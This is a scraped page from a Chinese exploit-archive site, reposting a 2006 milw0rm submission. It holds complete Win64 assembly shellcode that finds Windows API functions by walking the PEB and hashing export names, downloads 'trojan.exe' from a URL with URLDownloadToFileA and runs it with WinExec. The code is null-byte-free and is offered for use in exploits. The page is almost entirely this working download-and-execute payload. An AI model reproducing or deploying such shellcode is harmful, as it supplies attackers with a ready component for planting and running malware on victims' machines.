<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("text,readable") PageTitle=stripHTML("win64 (URLDownloadToFileA) download and execute 218+ bytes") ArticleIntro=stripHTML("77169.com小编引言:win64 (URLDownloadToFileA) download and execute 218+ bytes,漏洞的主要原因:") Articlecontent=stripHTML(";
; dexec64.asm - 218+ bytes (unoptimised)
;
; Win64 asm code, download & ex…") ModuleName = stripHTML("exploits") InfoID = stripHTML("139145") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> win64 (URLDownloadToFileA) download and execute 218+ bytes - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> shellcode >> 正文

win64 (URLDownloadToFileA) download and execute 218+ bytes

2006/8/5 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

;
; dexec64.asm - 218+ bytes (unoptimised)
;
; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec
;
; tested on AMD64 running Windows x64 SP1
;
; there probably are errors in the code, but this is more of an experimental source if nothing else.
; send corrections or errors to: 'weiss' wyse101 [at] gmail [dot] com
; code is not optimised at all, doesn't contain null bytes, so is possibly suitable for testing exploits on win64
;
; one of the main stumbling blocks in coding x64 asm on windows is the alignment of the stack.
; it must be aligned by 16 bytes because windows uses 128-bit SSE2, otherwise the api call will fail.
;
; thanx:
;
; roy g biv/29a - http://www.29a.net/
; Feryno - http://feryno.host.sk
; Tomasz Grysztar - http://flatassembler.org
;
format PE64 console 4.0
entry entrypoint

section '.text' code readable writeable executable ; assumed to be writeable when in memory, no NX obstruction!

; 1*8 is used rather than 0*8 because it uses null byte
LoadLibraryA equ rbp+1*8 ; using rbp is smaller than using ebp on 64-bit
WinExec equ rbp+2*8
URLDownloadToFileA equ rbp+3*8 ; must be rbp because of 64-bit URLMON base address

entrypoint:
jmp get_eip
load_dta:
pop rax
push rax
lea r15,[rax-(setup_stack-hashes)]
inc byte [rax-(setup_stack-url_end)] ; nullify tail end of url
inc byte [rax-(setup_stack-fname_end)] ; nullify end of filename
inc byte [rax-(setup_stack-url_mon_end)] ; nullify end of URLMON
ret ; go!

hashes:
dw 0bb86h ; LoadLibraryA() 635bbb86
dw 0a333h ; WinExec() 208da333

db 'URLMON',0ffh,0ffh
url_mon_end = $-2

dw 05f92h ; URLDownloadToFileA c91e5f92
dq -1
fname:
db 'trojan.exe',0ffh ; what to save as
fname_end = $-1

url:
db 'http://localhost/trojan.exe',0ffh ; where to download file from
url_end = $-1

get_eip:
call load_dta
setup_stack:
add rsp,-(4*8) ; 3 api variables, + 1 for avoiding null :-|
push rsp
pop rbp ; rbp = table of api
mov rdi,rbp ; rdi points to table also
stosq ; doesn't really do anything.
add rsp,-(11*8) ; reserve space for windows, when calling api

push 60h ; Hello, Ratter. 8-D
pop rcx
mov rax,[gs:rcx] ; Peb
mov rax,[rax+18h] ; PebLdr
mov rsi,[rax+30h] ; Ldr.InInitializationOrderModuleList
lodsq ; skip ntdll.dll
mov rbx,[rax+10h] ; kernel32.dll base

mov cl,2 ; get 2 api first
get_apis_loop:
mov eax,dword[rbx+3ch] ; MZ header size
lea rsi,[rbx+rax+78h] ; export directory begins at 88h
mov eax,dword[rsi+10h] ; extra instructions needed to avoid null bytes
lea rsi,[rbx+rax+1ch]

lodsd
lea r9,[rax+rbx]
lodsd
lea r10,[rax+rbx]
lodsd
lea r11,[rax+rbx]
xor r12,r12
load_index:
mov esi,dword[r10+4*r12]
add rsi,rbx
inc r12
xor eax,eax
cdq
hash_export:
lodsb
add edx,eax
rol edx, 5
dec eax
jns hash_export
ror edx, 5
cmp dx,word [r15] ; found api?
jne load_index

movzx edx,word [r11+2*r12-2]
mov eax,[r9+4*rdx]
add rax,rbx
add r15,2 ; skip hash

stosq ; save api address
loop get_apis_loop

push r15 ; push/pop to avoid null with mov
pop rcx
call qword[LoadLibraryA]

xchg rax,rbx
add r15,8 ; skip URLMON, first time.
push 1 ; get 1 api from URLMON
pop rcx
test rbx,rbx ; continue if not zero
jne get_apis_loop

dec ecx
push rbx
sub rsp,3*8 ; needed to align stack
xor r9,r9
mov r8,r15
lea rdx,[r8+(url-fname)]
call qword[URLDownloadToFileA]

push 1
pop rdx
mov rcx,r15
call qword[WinExec] ; WinExec(trojan.exe,SW_SHOWNORMAL??);

;jmp $ ; hang

call qword[ExitProcess] ; not required, testing only

; section below not required, simply for testing.
section '.idata' import data readable writeable

dd 0,0,0,RVA kernel_name,RVA kernel_table
dd 0,0,0,0,0

kernel_table:
ExitProcess dq RVA _ExitProcess
dq 0

kernel_name db 'KERNEL32.DLL',0

_ExitProcess dw 0
db 'ExitProcess',0

; July 2006 - (Ireland)

; milw0rm.com [2006-08-07]